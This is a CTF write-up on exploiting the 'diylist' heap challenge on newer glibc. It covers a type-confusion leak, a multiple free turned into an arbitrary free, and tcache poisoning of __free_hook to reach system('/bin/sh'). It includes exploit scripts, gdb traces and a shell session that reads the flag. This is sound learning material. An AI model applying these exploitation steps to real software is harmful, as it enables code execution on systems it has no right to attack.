exploit_pwn_chgs_ubuntu_21.10

Warm up exercises: preparing for the Ubuntu 21.10 CTFs

CTFs are awesome. It’s a great place for innovation, creativity, learning, and development. Also - it’s super fun.

In the past few years, we’ve seen the environments used to host challenges get updated, and we need to keep up with these changes and be aware of the differences between runtimes, mitigations, available features, etc. That’s why I thought it would be nice to take an old CTF challenge and solve it on newer versions of Ubuntu, to see what changed and what the environment of future CTFs might look like.

I looked for a pwn challenge from a 2020 CTF and tried to run its intended/official solution on Ubuntu 20.04 (which is already used to host CTFs) and on Ubuntu 21.10. After a short search, I chose “diylist”, a pwn challenge from zer0pts CTF 2020 that originally ran on Ubuntu 18.04. The challenge is quite simple, and all three solutions published on CTFtime (as well as the official/intended solution published in the CTF’s repo) rely on an outdated tcache behavior that is mitigated on Ubuntu 20.04.

So, I built an exploit that works on Ubuntu 20.04 with the default configuration. Then, because Ubuntu 21.10 changes the allocator’s behavior (encoding of freelist entries, disabling of the malloc hooks, etc.), I built another exploit for Ubuntu 21.10 with the default configuration. And just to make it more interesting, I enabled further mitigations that the original challenge did not enable.

To keep things organized, I will describe the challenge, what the published solutions did to solve it (they are very similar), exactly what I changed and which mitigations I enabled, and how I solved the challenge on both Ubuntu 20.04 and the latest 21.10. This blogpost doesn’t introduce anything new or novel, not even close :) But sometimes it’s nice to present the current state of the art in a lightweight way.

Let’s begin!

Intro to the challenge

The challenge implements a list of elements, and offers us the following operations:

int main(void)
{
  initialize();
  
  List *list = list_new();

  while(1) {
    switch(menu()) {
    case 1: add(list); break;
    case 2: get(list); break;
    case 3: edit(list); break;
    case 4: del(list); break;
    }
  }
}

Each element is defined as a union, and could be one of three different types:

typedef union {
  char *p_char;
  long d_long;
  double d_double;
} Data;

typedef struct {
  int size;
  int max;
  Data *data;
} List;

Because the element type is a union, the list buffer is simply an array of qwords. Each qword may be a numerical value (long/double) or a pointer to a string (lovely, right?). So how does the challenge know how to handle each element? It simply asks us for its type. That’s the first bug: a straightforward type confusion. You can clearly see this in the get command handler:

void get(List *list)
{
  printf("Index: ");
  long index = read_long();
  
  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);
  
  switch(read_long()) {
  case LIST_LONG:
    printf("Data: %ld\n", list_get(list, index).d_long);
    break;
    
  case LIST_DOUBLE:
    printf("Data: %lf\n", list_get(list, index).d_double);
    break;
    
  case LIST_STRING:
    printf("Data: %s\n", list_get(list, index).p_char);
    break;
    
  default:
    puts("Invalid option");
    return;
  }
}

And list_get looks as follows:

Data list_get(List* list, int index)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  return (Data)list->data[index].p_char;
}

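Please note that this bug does not give us memory corruption: we can only write data, or a pointer to a controlled string, to the list->data array. What it gives us is a great information disclosure primitive, and the ability to allocate controlled content at a known address. By design, we can:

  1. add a string and read it back as a long, which leaks the address of its heap buffer
  2. add a long holding any address and read it back as a string, which prints the bytes at that address (up to the first NUL)

Great, we have an arbitrary read primitive we can trigger as many times as we like.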
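To see what this confusion means at the byte level, here is a minimal Python sketch (not code from the challenge) that takes one qword of list->data and interprets it the way get() does for TYPE_LONG and TYPE_DOUBLE. The helper names are made up for illustration, and the pointer value is the heap address printed later in this post.

```python
import struct

def slot_from_pointer(ptr: int) -> bytes:
    """Pack a pointer the way it sits in list->data: one little-endian qword."""
    return struct.pack("<Q", ptr)

def as_long(slot: bytes) -> int:
    """The same bits as a signed 64-bit long (what TYPE_LONG prints)."""
    return struct.unpack("<q", slot)[0]

def as_double(slot: bytes) -> float:
    """The same bits as an IEEE-754 double (what TYPE_DOUBLE prints)."""
    return struct.unpack("<d", slot)[0]

heap_ptr = 0xaaaaddf4e7c0              # heap address from the exploit log
slot = slot_from_pointer(heap_ptr)
print(hex(as_long(slot)))              # 0xaaaaddf4e7c0: the pointer leaks verbatim
print(as_double(slot))                 # a tiny subnormal number
```

The other direction (store a number, read it back as TYPE_STRING) makes printf dereference that number, which is the arbitrary read; that half can’t be reproduced in pure Python.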

The second vulnerability is a double free (which we can convert into an arbitrary free). In order to implement the edit operation, the challenge has this logic:

void list_edit(List* list, int index, Data data, LIST_TYPE type)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");
  
  /* Store the data */
  switch(type) {
  case LIST_LONG:
    list->data[index].d_long = data.d_long;
    break;
  case LIST_DOUBLE:
    list->data[index].d_double = data.d_double;
    break;
  case LIST_STRING:
    list->data[index].p_char = strdup(data.p_char);
    /* Insert the address to free pool */
    if (fpool_num < MAX_FREEPOOL) {
      fpool[fpool_num] = list->data[list->size].p_char;
      fpool_num++;
    }
    break;
  default:
    __list_abort("Invalid type");
  }
}

As you can see, it simply calls strdup on the user’s input and stores the pointer to the newly allocated string in list->data.

Now, when we delete an item, the code needs to know if it’s a pointer to an allocated string buffer (that requires a free). For that, the challenge has the fpool array. Every time a new string is created, it stores its pointer in the fpool array, and every time you call the delete operation, the code scans this array to see if this value is actually a pointer to an allocated string, and if so, frees it:

void list_del(List* list, int index)
{
  int i;
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  Data data = list->data[index];

  /* Shift data list and remove the last one */
  for(i = index; i < list->size - 1; i++) {
    list->data[i] = list->data[i + 1];
  }
  list->data[i].d_long = 0;

  list->size--;

  /* Free data if it's in the pool list (which means it's string) */
  for(i = 0; i < fpool_num; i++) {
    if (fpool[i] == data.p_char) {
      free(data.p_char);
      break;
    }
  }
}

As you can see, this code does not remove the pointer from the array, doesn’t NULL it out, nothing. Therefore, nothing stops us from repeatedly triggering a free on any pointer in the fpool array.

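So, to conclude, we have the following bugs/primitives:

  1. type confusion: an arbitrary read and a heap address leak, as many times as we like
  2. multiple free: any pointer that was ever stored in fpool can be freed again and again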

Actually, the “multiple free” primitive could be easily converted and treated as arbitrary free. We can just trigger an allocation that reclaims the freed chunk between the two frees, and the second free will just free the newly allocated structure for us. Arbitrary free is a very powerful primitive, and in real workloads, it opens infinite opportunities for us. In our case, because we can confuse integers with pointers, we can write values arbitrarily to list->data, and if we could get these values into the fpool array, we could free them as many times as we like. This is the primitive I’m about to use :)
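The multiple-free logic is easy to model. The toy Python class below is hypothetical and only mirrors the shape of list_add/list_del and fpool (addresses are plain integers, and “free” just records the address). It shows that once a value has landed in fpool, storing the same number again as a long is enough to get it freed a second time. In the real exploit, something reclaims the chunk between the two frees, which is what turns this into an arbitrary free.

```python
class DiyListModel:
    """Toy model of list->data, fpool and the fpool check in list_del."""

    def __init__(self):
        self.data = []      # list->data
        self.fpool = []     # every string pointer ever handed out; never cleared
        self.freed = []     # addresses passed to free(), in order
        self._next = 0x1000

    def add_string(self) -> int:
        ptr = self._next            # stand-in for strdup()'s return value
        self._next += 0x20
        self.data.append(ptr)
        self.fpool.append(ptr)
        return ptr

    def add_long(self, value: int) -> None:
        self.data.append(value)     # just a number: no fpool entry

    def delete(self, index: int) -> None:
        value = self.data.pop(index)
        if value in self.fpool:     # same membership test as the loop in list_del
            self.freed.append(value)


lst = DiyListModel()
ptr = lst.add_string()
lst.delete(0)           # first free of ptr
lst.add_long(ptr)       # type confusion: store the same address as a long
lst.delete(0)           # fpool still contains ptr, so it is freed again
print([hex(a) for a in lst.freed])   # ['0x1000', '0x1000']
```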

But first, let’s review what the public solutions have done and which parts don’t work on newer versions.

Existing solutions overview

Please don’t read my text as criticism of those existing solutions; they’ve done a great job! This is how the world works: we run into new hardenings that break previous exploits.

First of all, two of the three solutions on CTFtime, as well as the official/intended one, relied on the fact that the main binary is not randomized. They used the addresses in the GOT to leak libc (we have an arbitrary read by design, thanks to the type confusion). Usually the main binary is randomized, so I enabled that in my challenge, which means I need another way to leak libc’s address. That’s not a problem, because there is a very common technique that everybody uses, and it still works on the latest versions.

One of the solutions on CTFtime actually used this method. It’s very simple: use dlmalloc to leak the base address of libc and resolve symbols (__free_hook, system, etc.). This is a very common trick: read the content of a freed chunk in the unsorted bin, whose FD/BK pointers point into main_arena inside libc. By leaking this address, we can resolve libc’s addresses. It’s simple, common, and works on the latest versions. Indeed, it’s the first thing I did myself.

The problems start with how all the solutions (including the intended one) gained a corruption primitive. The following is from the official/intended solution:

# libc leak (type confusion)
add(1, str(elf.got("puts")))
addr_puts = u64(get(0, 3))
libc_base = addr_puts - libc.symbol("puts")
logger.info("libc base = " + hex(libc_base))

# heap leak (type confusion)
add(3, "A" * 8)
addr_heap = int(get(1, 1))
logger.info("addr heap = " + hex(addr_heap))

# double free (free pool)
edit(0, 1, str(addr_heap))
delete(1)
delete(0)

# tcache poisoning
add(3, p64(elf.got("atol")))
add(3, "A" * 8)
add(3, p64(libc_base + libc.symbol("system")))

sock.interactive()

To sum it up, the TL;DR of what all the existing solutions have done:

  1. leak libc (some relied on lack of randomization of the main binary, one did not)
  2. trigger a “raw” double free, do a tcache attack, gain arbitrary write
  3. corrupt GOT entry in the main binary (again, relies on lack of randomization)

Just to show what happens if you run this approach on modern versions of libc, let’s run it on Ubuntu 20.04:

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x0000ffffab6fcd68 in __GI_abort () at abort.c:79
#2  0x0000ffffab74a29c in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0xffffab80b480 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x0000ffffab75167c in malloc_printerr (str=str@entry=0xffffab806f78 "free(): double free detected in tcache 2") at malloc.c:5347
#4  0x0000ffffab75328c in _int_free (av=0xffffab846a60 <main_arena>, p=0x1f15a300, have_lock=0) at malloc.c:4201
#5  0x0000000000400ef4 in list_del ()
#6  0x0000000000401484 in del ()
#7  0x0000000000401578 in main ()
(gdb) 

Note the message in malloc_printerr: “free(): double free detected in tcache 2”. That means the second step (the tcache double-free attack) is broken. This attack was mitigated in glibc a few years ago. Many have talked about it before (example), so I won’t repeat that here. The important part is that it doesn’t work on new versions of libc due to an explicit check, and you’ll get a SIGABRT instead.
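For intuition, here is a heavily simplified Python model of the check that fires here. Since glibc 2.29, a chunk put into the tcache gets a key value written into it; free() treats a chunk carrying that key as suspicious, walks the bin, and aborts if the chunk is really there. The class below is a toy, not glibc’s code: it keeps only that logic and the fact that taking a chunk out of the tcache clears the key.

```python
class TcacheBinModel:
    """Toy model of one tcache bin and the glibc >= 2.29 double-free check."""

    def __init__(self):
        self.entries = []     # LIFO: the last element is the bin's head
        self.has_key = set()  # chunks whose key field currently holds the tcache key

    def free(self, chunk: int) -> None:
        # Key present: probably already in the tcache, so walk the bin to confirm.
        if chunk in self.has_key and chunk in self.entries:
            raise RuntimeError("free(): double free detected in tcache 2")
        self.has_key.add(chunk)
        self.entries.append(chunk)

    def malloc(self) -> int:
        chunk = self.entries.pop()
        self.has_key.discard(chunk)  # tcache_get() clears the key
        return chunk


bin_ = TcacheBinModel()
bin_.free(0x1f15a300)        # chunk address from the backtrace above
try:
    bin_.free(0x1f15a300)    # "raw" double free: aborts
except RuntimeError as err:
    print(err)

bin_.malloc()                # reclaim the chunk in between...
bin_.free(0x1f15a300)        # ...and the second free goes through
```

The last two calls are the “reclaim between the frees” pattern described earlier, which is why the arbitrary-free idea still works on new glibc versions.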

However, since we are already looking at pwn challenges, let’s make this more interesting. The solution also takes advantage of a few missing mitigations, such as randomization of the main binary (libc is randomized, by the way). So, to make it more fun, let’s change the following:

  1. build the main binary as PIE (-fpie -pie)
  2. enable stack canaries (-fstack-protector)
  3. enable full RELRO (-Wl,-z,relro,-z,now)

My new Makefile looks as follows:

--- a/diylist/challenge/Makefile
+++ b/diylist/challenge/Makefile
@@ -1,12 +1,12 @@
 all:
-       gcc -shared diylist.c -o libdiylist.so -fPIC
-       gcc main.c -o chall -L./ -ldiylist -no-pie
-       strip --strip-all chall
-       cp chall ../distfiles/
+       clang -shared diylist.c -o libdiylist.so -fPIC -fstack-protector -Wl,-z,relro,-z,now
+       clang diylist.c main.c -o chg -fpie -pie -fstack-protector -Wl,-z,relro,-z,now
+       strip --strip-all chg
+       cp chg ../distfiles/
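A quick way to confirm that the rebuilt binary really is position-independent is to look at the ELF header’s e_type field: PIE executables are ET_DYN (like shared libraries), while classic -no-pie binaries are ET_EXEC. The minimal Python sketch below is only a rough heuristic (tools like checksec, whose output pwntools prints in the logs below, look at more than this), and the path in the usage note is assumed.

```python
import struct

ET_EXEC, ET_DYN = 2, 3

def elf_type(header: bytes) -> int:
    """Return e_type from the first 18 bytes of an ELF file."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    endian = "<" if header[5] == 1 else ">"   # EI_DATA: 1 = little, 2 = big endian
    return struct.unpack_from(endian + "H", header, 16)[0]

def looks_like_pie(path: str) -> bool:
    """Heuristic: ET_DYN means a PIE executable (or a shared library)."""
    with open(path, "rb") as f:
        return elf_type(f.read(18)) == ET_DYN
```

For example, looks_like_pie("distfiles/chg") should return True for the rebuilt binary (path assumed from the logs).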

Now, let’s start developing exploits for Ubuntu 20.04 and 21.10.

Exploit - Ubuntu 20.04

I started by leaking libc’s base address. This method is classic for CTF pwn challenges and comes up again and again. The following code does it:

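def leak_ptrs(p):
    add(p, TYPE_STRING, b"A"*0x10)
    # 0x7f characters + NUL -> strdup(0x80) -> 0x90 chunks, too big for fastbins
    for i in range(9):
        add(p, TYPE_STRING, b"C"*0x7f)
    # deleting index 0 eight times frees the "A" string and the first seven
    # "C" strings, which fills the 0x90 tcache bin (7 entries)
    for i in range(8):
        delete(p, 0)

    # leak heap (type confusion): list[0] is now the 8th "C" string
    heap_addr = int(get(p, 0, TYPE_LONG))

    print("[*] edit list[1] to point to list[0], which has main_arena symbol in its content")
    edit(p, 1, TYPE_LONG, heap_addr)

    print("[*] delete list[0], move list[1] one position backward")
    # the 0x90 tcache bin is full, so this chunk goes to the unsorted bin
    delete(p, 0)

    print("[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc")
    main_arena = u64(get(p, 0, TYPE_STRING).ljust(8, b"\x00"))

    return (heap_addr, main_arena)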

output:

root@a8fed2c03baf:/challenge# python3 solve.py 
[+] Starting local process './distfiles/chg': pid 85839
attach
[*] '/lib/aarch64-linux-gnu/libc.so.6'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/challenge/distfiles/chg'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0x3b1e7c0
[*] main_arena @ 0xffffa606bac0
[*] resolved addresses:
    libc @ 0xffffa5efe000
    __free_hook @ 0xffffa606e760
    system @ 0xffffa5f41978

Now, armed with heap and libc addresses, let’s get to our corruption primitive. We can’t do a “raw” double/multiple free attack on tcache like the existing solutions did, because glibc now aborts on such old tcache behaviors. The main issue is that even with this simple type confusion, we can only write data to the list->data array; we can’t dereference arbitrary memory and write to it. Even when we add/edit strings, our content goes directly to strdup, and the pointer to the newly allocated buffer is stored in the list->data array.

However, I came up with an elegant and easy trick: get the address of the list->data array itself into the fpool array, and trigger a free of it.

Sounds good, right? If we could free the list->data array, we could gain a write primitive to a freed chunk! And hey, with dlmalloc, that’s an arbitrary write :) Let’s see how we could do it.
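Here is why a write into a freed chunk is so valuable, as a toy Python model of a single tcache bin (no safe-linking, which Ubuntu 20.04’s glibc doesn’t have). A freed chunk’s first qword is its next pointer, and a TYPE_LONG edit of index 0 of the freed list->data writes exactly that qword. The model also keeps the per-bin counter that recent glibc versions check before taking a chunk from the tcache, which is likely why the exploit below frees a couple of same-sized strings first. All names and addresses are made up.

```python
class TcachePoisonModel:
    """Toy tcache bin over a dict 'memory' (address -> qword); no safe-linking."""

    def __init__(self, memory: dict):
        self.memory = memory
        self.head = 0      # 0 means empty
        self.count = 0

    def free(self, chunk: int) -> None:
        self.memory[chunk] = self.head   # chunk->next = head
        self.head = chunk
        self.count += 1

    def malloc(self):
        if self.count == 0:
            return None                  # glibc would fall back to the other bins
        chunk = self.head
        self.head = self.memory.get(chunk, 0)
        self.count -= 1
        return chunk


memory = {}
tcache = TcachePoisonModel(memory)
tcache.free(0x5000)           # padding chunk (hypothetical address)
tcache.free(0x5070)           # padding chunk
list_data = 0x4000            # the freed list->data array (hypothetical address)
tcache.free(list_data)

target = 0xdeadbe00           # where we want malloc to return
memory[list_data] = target    # edit(list, 0, TYPE_LONG, target): overwrite next

print(hex(tcache.malloc()))   # 0x4000: list->data comes back first
print(hex(tcache.malloc()))   # 0xdeadbe00: the next allocation lands on our target
```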

shaping the heap

Well, the “shape” here is very simple. First, we need to understand how the list->data allocation works. This is done in the list_add function:

void list_add(List* list, Data data, LIST_TYPE type)
{
  Data *p;
  
  if (list->size >= list->max) {
    /* Re-allocate a chunk if the list is full */
    Data *old = list->data;
    list->max += CHUNK_SIZE;
    
    list->data = (Data*)malloc(sizeof(Data) * list->max);
    if (list->data == NULL)
      __list_abort("Allocation error");

    if (old != NULL) {
      /* Copy and free the old chunk */
      memcpy((char*)list->data, (char*)old, sizeof(Data) * (list->max - 1));
      free(old);
    }
  }

  /* Store the data */
  switch(type) {
	...
  }
  
  list->size++;
}

Pretty straightforward: if the list is full (size >= max), the code reallocates the array (that’s basically what the code above does). The allocation sizes of this array are 0x20, 0x40, 0x60, 0x80 and 0xd0. And obviously, once it grows to a certain size, it won’t shrink.

I chose to target 0x60. The exact size doesn’t really matter; we can exploit this with any of them. Part of the reason is that my goal is to create a hole by allocating a string and freeing it, and we can’t allocate a string longer than 0x80. Yes, we could get around that by triggering a coalesce etc., but I think 0x60 is a fine target here.
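A freed string can become the list->data array because both requests map to the same chunk size, and therefore the same tcache bin. The Python sketch below mirrors glibc’s request2size and csize2tidx macros for 64-bit targets (16-byte alignment); the Python function names are just for illustration.

```python
SIZE_SZ = 8            # sizeof(size_t) on a 64-bit target
MALLOC_ALIGNMENT = 16
MINSIZE = 0x20

def request2size(req: int) -> int:
    """Chunk size glibc malloc uses for a request of `req` bytes."""
    size = (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MINSIZE)

def tcache_index(chunk_size: int) -> int:
    """Which tcache bin a chunk of this size goes to (csize2tidx)."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

print(hex(request2size(0x61)))   # 0x70: strdup("R"*0x60) asks for 0x61 bytes
print(hex(request2size(0x60)))   # 0x70: a 0x60-byte list->data array
print(tcache_index(0x70))        # 5: same bin for both
```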

This will be our exploit now:

def create_dangling_ptr_in_fpool(p):
    # strdup("R"*0x60) requests 0x61 bytes; its address is recorded in fpool
    add(p, TYPE_STRING, b"R"*0x60)
    list_data_ptr = int(get(p, 0, TYPE_LONG))
    delete(p, 0)

    # grow list->data until a reallocation reclaims the freed string chunk,
    # whose address is still in fpool
    for i in range(8):
        add(p, TYPE_LONG, bytes(str(0), "utf-8"))
    for i in range(8):
        delete(p, 0)

    return list_data_ptr

list_data_ptr = create_dangling_ptr_in_fpool(p)
print("[*] good, now fpool[0] points to list. list_data_ptr == 0x%x" % list_data_ptr)

heap_addr, main_arena = leak_ptrs(p)
print("[*] heap_addr @ 0x%x" % heap_addr)
print("[*] main_arena @ 0x%x" % main_arena)
Now all we need to do is use the edit command to write the address of the list->data array into one of its own elements, and free it! Then we can call edit again, write arbitrary numerical values to the FD/BK of the freed chunk, and gain an arbitrary write. Let’s test it out:

    # start corruption phase!
    strings_idx = []
    strings_idx.append(add(p, TYPE_STRING, b"P"*0x60))
    strings_idx.append(add(p, TYPE_STRING, b"P"*0x60))
    strings_idx.append(add(p, TYPE_STRING, b"P"*0x60))
    delete(p, strings_idx[:-1])

    print("[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write")
    edit(p, 1, TYPE_LONG, list_data_ptr)
    delete(p, 1)
    
    print("[*] corrupt list_data_ptr->FD, make it point to __free_hook")
    #edit(p, 0, TYPE_LONG, free_hook-0x58)
    edit(p, 0, TYPE_LONG, 0x41414141)
    edit(p, 1, TYPE_LONG, 0)
   
    for i in range(3):
        fake = b"A"*0x58
        fake += p64(system_addr)
        add(p, TYPE_STRING, fake)

And indeed, we segfault in malloc, when it parses our controlled value as a freelist entry:

Program received signal SIGSEGV, Segmentation fault.
__GI___libc_malloc (bytes=bytes@entry=95) at malloc.c:3051
3051	malloc.c: No such file or directory.
(gdb) x/2i $pc
=> 0xffff8410e8e8 <__GI___libc_malloc+272>:	ldr	x3, [x4]
   0xffff8410e8ec <__GI___libc_malloc+276>:	str	x3, [x19, #128]
(gdb) i r x4
x4             0x41414141          1094795585
(gdb) 
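The bytes=95 in the backtrace follows from how the payload travels through strdup. The fake string is 0x58 filler bytes plus an 8-byte address, but an aarch64 user-space address like system’s has two zero bytes on top, and strdup only copies up to the first NUL. The Python sketch below (hypothetical helpers; the address is system() from the 20.04 log) reproduces that arithmetic. It also means the top byte of the target qword is never written, so the trick relies on that byte already being zero.

```python
import struct

def fake_payload(value: int, filler_len: int = 0x58) -> bytes:
    """0x58 filler bytes followed by a little-endian qword, like `fake` above."""
    return b"A" * filler_len + struct.pack("<Q", value)

def strdup_malloc_size(buf: bytes) -> int:
    """Bytes strdup() asks malloc for: the string up to the first NUL, plus the NUL."""
    nul = buf.find(b"\x00")
    return (len(buf) if nul == -1 else nul) + 1

payload = fake_payload(0xffff96bdd978)   # system() from the 20.04 log
print(len(payload))                      # 96
print(strdup_malloc_size(payload))       # 95
```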

The decimal representation problem

And now, something annoying happens. When we try to corrupt __free_hook, we fail:

Program received signal SIGSEGV, Segmentation fault.
__GI___libc_malloc (bytes=bytes@entry=95) at malloc.c:3051
3051	malloc.c: No such file or directory.
(gdb) x/2i $pc
=> 0xffff7fca88e8 <__GI___libc_malloc+272>:	ldr	x3, [x4]
   0xffff7fca88ec <__GI___libc_malloc+276>:	str	x3, [x19, #128]
(gdb) i r x4
x4             0x19998cc8fa4d      28147282672205
(gdb) 

What’s going on?

As it turns out, we are one byte short. Yes, you read that right. These are the functions that read our different kinds of input:

long read_long(void)
{
  char buf[16];
  read(0, buf, 14);
  return atol(buf);
}

double read_double(void)
{
  char buf[16];
  read(0, buf, 14);
  return atof(buf);
}

void read_str(char *buf)
{
  int size = read(0, buf, 127);
  char *nl = strchr(buf, '\n');
  if (nl != NULL) {
    *nl = '\x00';
  } else {
    buf[size] = 0;
  }
}

And the address of __free_hook looks something like this (up to ASLR randomization, of course):

>>> 0xffff7fd9c760
281472826722144
>>> len(str(_))
15
>>> 

That’s one character more than read_long accepts :( And yes, that’s exactly the value we get when our last digit is not read. Indeed, all the published solutions used the add/edit commands to write addresses in the main binary (which are very low in this case, because the main binary is not randomized).

Therefore, we can’t write high addresses (such as libc’s). We can, however, send a string whose content is a libc address (as long as it contains no NULL bytes, of course); for that, we first need to write the address of a good target to corrupt, which is where GOT entries come into play (the original binary doesn’t have full RELRO either).
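The failure is easy to reproduce offline. This Python model of read_long (a hypothetical helper that assumes the whole decimal string arrives in one read() and that the bytes after it aren’t digits) keeps only the first limit characters before converting, like read(0, buf, 14) followed by atol(buf):

```python
def read_long_model(value: int, limit: int = 14) -> int:
    """read(0, buf, limit) + atol(buf), assuming buf[limit:] holds no digits."""
    return int(str(value)[:limit])

free_hook = 0xffff7fd9c760
print(len(str(free_hook)))                          # 15
print(read_long_model(free_hook))                   # 28147282672214: last digit dropped
print(read_long_model(free_hook, 15) == free_hook)  # True
print(hex(10**14 - 1))                              # 0x5af3107a3fff: largest value that fits
```

Anything above 0x5af3107a3fff is out of reach, which covers both libc (0xffff…) and PIE heap (0xaaaa…) addresses on this aarch64 machine, while the original non-PIE heap (around 0x3b1e7c0) fits easily.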

But I won’t just stand here and claim that this is what breaks our entire approach; we can quickly test it. Let’s patch and rebuild the binary to remove the 14-character restriction, and run our new exploit. I simply changed the “14” in read_long to 15 and reran my exploit:

diff --git a/diylist/challenge/main.c b/diylist/challenge/main.c
index b7422aa..1f20216 100644
--- a/diylist/challenge/main.c
+++ b/diylist/challenge/main.c
@@ -7,7 +7,7 @@
 long read_long(void)
 {
   char buf[16];
-  read(0, buf, 14);
+  read(0, buf, 15);
   return atol(buf);
 }

And, the output:

root@0f5b4da89c72:/chg# python3 solve.py 
[+] Starting local process './distfiles/chg': pid 130
attach
[*] '/lib/aarch64-linux-gnu/libc.so.6'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/chg/distfiles/chg'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] good, now fpool[0] points to list. list_data_ptr == 0xaaaaddf4e2f0
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0xaaaaddf4e7c0
[*] main_arena @ 0xffff96d07ac0
[*] resolved addresses:
    libc @ 0xffff96b9a000
    __free_hook @ 0xffff96d0a760
    system @ 0xffff96bdd978
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to __free_hook
[*] __free_hook('/bin/sh/')
[*] exploit done, system('/bin/sh') achieved, call interactive()
[*] Switching to interactive mode
$ lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 20.04.2 LTS
Release:    20.04
Codename:    focal
$ ls
challenge  distfiles  flag.txt    solve.py
$ cat flag.txt
ThisIsMyFlag
$ 
[*] Interrupted
[*] Stopped process './distfiles/chg' (pid 130)
root@0f5b4da89c72:/chg# 

Everything works! So we know what our problem is: we need to send a long value that represents a libc address within the 14-character limit of its decimal representation. This matters because, unfortunately, atol only parses decimal input (unlike strtol with base 0 or 16, which accepts a “0x…” prefix).
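To see why strtol would have been enough, compare the lengths of the two representations. Python’s int(text, 0) is used here only as a stand-in for strtol(text, NULL, 0), since both accept an optional 0x prefix; the address is __free_hook from the run above.

```python
addr = 0xffff96d0a760          # __free_hook from the patched 20.04 run
as_decimal = str(addr)
as_hex = hex(addr)

print(len(as_decimal), len(as_hex))   # 15 14
print(int(as_hex, 0) == addr)         # True: base-0 parsing honours the 0x prefix
```

Twelve hex digits plus the “0x” prefix is exactly 14 characters, so a hex-aware parser would have fit in the original read.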

Ideas for bypassing the 14-characters issue

I had a few ideas here that I’d like to note. They’re pretty trivial, but I’m listing them for the sake of completeness.

  1. Negative values and TBI: first of all, while atol doesn’t parse the “0x” prefix, it does parse negative values. Therefore, we could easily get values with the high bit set. However, that’s pointless, because such values represent kernel addresses.

    I could be really annoying and say “hey, if the challenge enabled TBI (Top-Byte-Ignore), I could have used that!” (sorry, I had to say that :P). Well, that’s true, but the challenge does not enable TBI, and even if it did, it wouldn’t help. The read_long function returns the value in a 64-bit register, and the code uses 32-bit types. Therefore, we will always have sign extension and the value will be huge. So even if address translation ignored the top byte, many other bytes would still be 0xff anyway, and we can’t build a libc address that way.

  2. Uninitialized stack buffer: that’s a more relevant idea. You probably noticed that read_long and read_double are vulnerable to an uninitialized-memory bug! You can easily see this in the source code snippets I pasted above. The function reads 14 bytes into buf, an uninitialized 16-byte buffer on the stack, and read() doesn’t NUL-terminate it, so atol may keep parsing into the two uninitialized bytes that follow. It’s very clear from the binary as well:

    .text:0000000000400F14 nptr= -0x18
    .text:0000000000400F14 buf= -0x10
    .text:0000000000400F14 var_s0=  0
    .text:0000000000400F14
    .text:0000000000400F14 SUB             SP, SP, #0x30
    .text:0000000000400F18 STP             X29, X30, [SP,#0x20+var_s0]
    .text:0000000000400F1C ADD             X29, SP, #0x20
    .text:0000000000400F20 MOV             W8, WZR
    .text:0000000000400F24 MOV             X2, #0xE ; nbytes
    .text:0000000000400F28 ADD             X9, SP, #0x20+buf
    .text:0000000000400F2C MOV             W0, W8  ; fd
    .text:0000000000400F30 MOV             X1, X9  ; buf
    .text:0000000000400F34 STR             X9, [SP,#0x20+nptr]
    .text:0000000000400F38 BL              .read
    .text:0000000000400F3C LDR             X9, [SP,#0x20+nptr]
    .text:0000000000400F40 MOV             X0, X9  ; nptr
    .text:0000000000400F44 BL              .atol
    .text:0000000000400F48 LDP             X29, X30, [SP,#0x20+var_s0]
    .text:0000000000400F4C ADD             SP, SP, #0x30 ; '0'
    .text:0000000000400F50 RET
    .text:0000000000400F50 ; End of function read_long
    

    In theory, we could shape the stack (by calling functions that write data to the stack) and hopefully set the 15th byte to a controlled or partially controlled value. Unfortunately, I didn’t find a flow in the challenge that writes that deep into the stack.
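The negative-value idea from item 1 can be checked with a few lines of Python (a hypothetical helper): atol’s result is stored as a 64-bit two’s-complement value, so even the most negative number that fits in 14 characters has its top 20 bits set, far from the 0x0000ffff… range where libc lives.

```python
MASK64 = (1 << 64) - 1

def stored_bits(text: str) -> int:
    """64-bit pattern stored in list->data for a decimal string (two's complement)."""
    return int(text) & MASK64

print(hex(stored_bits("-1")))                   # 0xffffffffffffffff
most_negative = "-" + "9" * 13                  # 14 characters, the read_long limit
print(hex(stored_bits(most_negative) >> 44))    # 0xfffff
```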

